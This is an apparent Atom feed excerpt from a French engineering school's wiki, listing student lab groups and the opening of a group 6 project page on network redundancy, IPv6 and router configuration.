  &amp;lt;td&amp;gt;[[ TP sysres IMA2a5 2015/2016 G6 | Cahier groupe n°6]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Eric BOURRE&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Configuration routeur&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[ TP sysres IMA2a5 2015/2016 G7 | Cahier groupe n°7]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Nour ZERHOUNI&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Configuration commutateur&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=22507</id>
		<title>TP sysres IMA2a5 2015/2016 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=22507"/>
				<updated>2015-10-27T19:25:07Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : Page créée avec « &amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;  &amp;lt;h2&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h2&amp;gt;  Cet atelier consiste en la réalisation d'une maquette de réseau permettant de mani... »&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt; 1ère Étape : La configuration du routeur &amp;lt;/h2&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	</feed>